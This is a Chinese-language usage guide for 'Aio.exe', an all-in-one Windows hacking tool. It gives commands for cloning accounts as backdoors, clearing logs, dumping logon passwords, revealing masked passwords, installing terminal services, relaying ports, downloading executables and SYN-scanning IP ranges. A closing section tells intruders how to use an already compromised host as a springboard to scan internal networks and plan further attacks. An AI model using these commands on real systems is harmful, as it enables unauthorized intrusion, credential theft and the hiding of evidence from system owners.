這是一個將很多小工具功能集成一體的一個"工具".
(如果你使用的是Build 04/01/2006版本,那版本中的syn掃描因編譯時原因有些問題,請更新為Build 06/10/2006版本)
功能:
1.AutoRun -> 查看一般登陸後啟動的項
用法:Aio.exe -AutoRun
2.Clone -> 克隆帳戶
用法: Aio.exe -Clone 正常帳號 要被克隆帳戶 密碼
例子: Aio.exe -Clone Administrator Guest test
幫助: Aio.exe -Clone
不需要在system許可權下也可用
3.CheckClone -> 檢測克隆帳戶
用法: Aio.exe -CheckClone
不需要在system許可權下也可用
4.CleanLog -> 清除日誌
用法: Aio.exe -CleanLog
5.ConfigService -> 修改服務的啟動類型
用法: Aio.exe -ConfigService 伺服器 啟動類型
例子: Aio.exe -ConfigService W3svc Demand ->手動啟動
例子: Aio.exe -ConfigService W3svc Auto ->自動啟動
例子: Aio.exe -ConfigService W3svc Disabled ->禁止啟動
幫助: Aio.exe -ConfigService
6.DelUser -> 刪除系統帳戶
用法: Aio.exe -DelUser 帳戶
例子: Aio.exe -DelUser Guest
幫助: Aio.exe -DelUser
(注意: 可以刪除系統內建帳號,象Administrator,Guest等,小心使用)
7.EnumService -> 列舉系統服務
用法: Aio -EnumService All|Running|Stopped
例子: Aio -EnumService All -> 列舉所有服務
例子: Aio -EnumService Running -> 列舉正在運行的服務
例子: Aio -EnumService Stopped -> 列舉停止了的服務
幫助: Aio -EnumService
8.FHS -> 檢查系統隱藏服務
用法: Aio.exe -FHS
9.FGet -> FTP下載
用法: Aio.exe -FGet FTP位址 埠 用戶名 密碼 要下載檔案名
例子: Aio.exe -FGet 12.12.12.12 21 test test a.exe
例子: Aio.exe -FGet 12.12.12.12 21 test test *.exe (下載所有exe檔)
幫助: Aio.exe -FGet
10.FindPassword -> 得到NT/2K所有登陸系統使用者密碼
用法: Aio.exe -FindPassword
11.InstallService -> 安裝服務
用法: Aio.exe -InstallService 服務名 檔案名
例子: Aio.exe -InstallService test test.exe
幫助: Aio.exe -InstallService
11.InstallService -> 安裝驅動
用法: Aio.exe -InstallDrver 服務名 驅動檔案名
例子: Aio.exe -InstallDriver test test.sys
幫助: Aio.exe -InstallDriver
12.KillTCP -> 殺掉一個TCP連接
用法: Aio.exe -KillTCP 本地IP 本地埠 遠端位址 遠端埠
例子: Aio.exe -KillTCP 192.168.1.1 80 61.61.61.61 7890
幫助: Aio.exe -KillTCP
(參數可以通過netstat -an得到)
13.LogOff -> 登出系統
用法: Aio.exe -LogOff
14.MGet -> HTTP下載檔案
用法: Aio.exe -MGet URL <保存為檔案名>
例子: Aio.exe -MGet http://www.abc.com/test.exe abc.exe
幫助: Aio.exe -MGet
15.MPort -> 埠和程式關連映射
用法: Aio.exe -Mport
16.Never -> 將系統帳戶登陸次數重置為0
用法: Aio.exe -Never 帳戶
例子: Aio.exe -Never Guest
幫助: Aio.exe -Never
17.PowerOff -> 關機,關電源
用法: Aio.exe -PowerOff
18.Pslist -> 列進程
用法: Aio.exe -Pslist
19.Pskill -> 殺進程
用法: Aio.exe -Pskill PID|進程名
例子: Aio.exe -Pskill 3465
例子: Aio.exe -Pskill Iexplore
20.PortScan -> 埠掃描(Syn和TCP掃描)
用法: Aio.exe -PortScan Syn|TCP -S 起始位址 -E 終止位址 -P 埠列表 -T 執行緒數 </Banner> </TS> </S5> </Save>
例 子: Aio.exe -PortScan Syn -S 61.129.1.1 -E 61.129.1.255 -P 3389 -T 512 /TS -> 掃描61.129.1.1到61.129.1.255的主機的3389埠,檢查是否打開的是終端
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /TS -> 掃描61.129.12.12主機65535個埠,檢查哪個埠打開的終端服務
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /S5 -> 掃描61.129.12.12主機65535個埠,檢查哪個埠打開的Socks5服務
幫助: Aio.exe -PortScan
(更多用法,請參考我發佈的SynScan)
這個功能的用法是最多的,而且也是很強大的.(Syn掃描只適用於2K或以上系統)
21.PortRelay -> TCP資料轉發
用法: Aio.exe -PortRelay 本地綁定埠 轉發至的IP 轉發至埠
例子: Aio.exe -PortRelay 3389 211.12.12.12 3389
幫助: Aio.exe -PortRelay
22.Reboot -> 重啟系統
用法: Aio.exe -Reboot
23.RemoveService -> 刪除服務
用法: Aio.exe -RemoveService 要刪除的服務
例子: Aio.exe -RemoveService test
幫助: Aio.exe -RemoveService
24.StartService -> 啟動服務
用法: Aio.exe -StartService 要啟動的服務
例子: Aio.exe -StartService test
幫助: Aio.exe -StartService
25.StopService -> 停止服務
用法: Aio.exe -StopService 要停止的服務
例子: Aio.exe -StopService Test
幫助: Aio.exe -StopService
26.Sysinfo -> 查看系統資訊
用法: Aio.exe -Sysinfo
27.ShutDown -> 關機
用法: Aio.exe -ShutDown
28.Terminal -> 安裝終端服務(2K/XP/2003中都適用)
用法: Aio.exe -Terminal 埠
例子: Aio.exe -Terminal 3389
幫助: Aio.exe -Terminal
29.Unhide -> 查看星號密碼(NT系統有效)
用法: Aio.exe -Unhide
30.WinInfo -> 查看帳號資訊等
用法: Aio.exe -WinInfo <帳戶>
例子: Aio.exe -WinInfo
例子: Aio.exe -WinInfo Guest
來源:http://luoq.net/All-In-One-aio/
下載:aio
在渗透入侵中,黑客可以利用已獲得的溢出主機,将其作為跳板,進一步入侵攻击其他的主機。。
例如:可以在溢出主機上掃描内網中其他主機開放的埠號,探測内部區域網路訊息,可以輸入下列命令實現:
Aio.exe -Portscan Syn -s 192.168.1.1 -E 192.168.1.255 -P 3389 -T 512 /TS
這個命令執行後,可以掃描192.168.1.1~~~~~192.168.1.255的IP段,打開3389埠的主機。這裡指定掃描的是一個內網的IP段,我們
也可以換成一個廣域網路的IP段。
另外,我们也可以掃描指定的一個IP主機,取得網路訊息决定入侵的方案。在遠程溢出視窗中,可以輸入以下指令執行執行命令:
假如我们掃的主機IP是:192.168.1.11 那麼,輸入的指令是
Aio.exe -Portscan Syn -s 192.168.1.11 -P 1--65535 -T 512 /TS
這裡的1-65535 是指埠號數(理論上一台電腦有65535個埠號)
剛才的指令意思是掃描IP192.168.1.11的主機,檢查遠程终端服務所使用的埠號,也可以掃描指定的一個埠號服務!!